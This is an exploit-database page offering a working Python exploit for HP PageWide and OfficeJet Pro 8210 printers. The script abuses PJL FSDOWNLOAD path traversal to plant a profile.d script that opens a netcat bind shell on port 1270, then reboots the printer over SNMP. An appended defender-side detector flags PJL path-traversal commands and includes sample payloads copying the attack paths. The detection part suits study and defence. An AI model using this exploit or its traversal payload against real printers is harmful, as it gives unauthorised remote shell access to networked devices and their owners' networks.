0day.today - Biggest Exploit Database in the World.
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution Exp
Security Risk Critical
```python
##
# Create a bind shell on an unpatched OfficeJet 8210
# Write a script to profile.d and reboot the device. When it comes
# back online then nc to port 1270.
#
# easysnmp instructions:
# sudo apt-get install libsnmp-dev
# pip install easysnmp
##

import socket
import sys
from easysnmp import snmp_set

profile_d_script = ('if [ ! -p /tmp/pwned ]; then\n'
                    '\tmkfifo /tmp/pwned\n'
                    '\tcat /tmp/pwned | /bin/sh 2>&1 | /usr/bin/nc -l 1270 > /tmp/pwned &\n'
                    'fi\n')

if len(sys.argv) != 3:
    print '\nUsage:upload.py [ip] [port]\n'
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)

server_address = (sys.argv[1], int(sys.argv[2]))
print 'connecting to %s port %s' % server_address
sock.connect(server_address)

dir_query = '@PJL FSDOWNLOAD FORMAT:BINARY SIZE=' + str(len(profile_d_script)) + ' NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
dir_query += profile_d_script
dir_query += '\x1b%-12345X'
sock.sendall(dir_query)
sock.close()

sock1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock1.connect(server_address)
dir_query = '@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
sock1.sendall(dir_query)

response = ''
while True:
    data = sock1.recv(1)
    if '\n' == data: break
    response += data

print response

snmp_set('.1.3.6.1.2.1.43.5.1.1.3.1', 4, 'integer', hostname='192.168.1.158', community='public', version=1)

print 'Done! Try port 1270 in ~30 seconds'
```
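A defender-side check for the request shape this script sends, as an added example (not part of the original listing or the exploit author's code): it scans a reassembled print-channel payload for PJL filesystem commands whose NAME argument climbs above the volume root. The function names and the sample bytes are constructed for illustration.

```python
import posixpath
import re

# PJL filesystem commands that carry a NAME="volume:/path" argument.
PJL_FS_CMD = re.compile(
    rb'@PJL\s+(FSDOWNLOAD|FSUPLOAD|FSQUERY|FSDELETE|FSAPPEND|FSMKDIR|FSDIRLIST)\b'
    rb'[^\r\n]*?NAME\s*=\s*"([^"\r\n]*)"',
    re.IGNORECASE,
)

def escapes_root(path):
    """True if '..' segments ever climb above the volume root."""
    depth = 0
    for segment in path.replace("\\", "/").split("/"):
        if segment in ("", "."):
            continue
        depth += -1 if segment == ".." else 1
        if depth < 0:
            return True
    return False

def find_pjl_traversal(payload):
    """Return (command, raw NAME, resolved path) for every PJL filesystem
    command in `payload` (bytes) whose NAME escapes the volume root."""
    findings = []
    for match in PJL_FS_CMD.finditer(payload):
        command = match.group(1).decode("ascii").upper()
        name = match.group(2).decode("latin-1")
        # Drop the volume prefix ("0:") when present.
        path = name.partition(":")[2] if ":" in name else name
        if escapes_root(path):
            resolved = posixpath.normpath("/" + path.replace("\\", "/").lstrip("/"))
            findings.append((command, name, resolved))
    return findings

# Constructed sample: one in-volume query plus the two request shapes from the page.
SAMPLE = (
    b'@PJL FSQUERY NAME="0:/fonts/../fonts/a.ttf"\r\n'
    b'@PJL FSDOWNLOAD FORMAT:BINARY SIZE=4 NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
    b'test\x1b%-12345X'
    b'@PJL FSQUERY NAME="0:/../../rw/var/etc/profile.d/lol.sh"\r\n'
)

if __name__ == "__main__":
    for command, name, resolved in find_pjl_traversal(SAMPLE):
        print("ALERT %s NAME=%r resolves to %s" % (command, name, resolved))
```

Tracking directory depth, rather than matching the literal string `..`, keeps in-volume paths such as `0:/fonts/../fonts/a.ttf` from raising alerts.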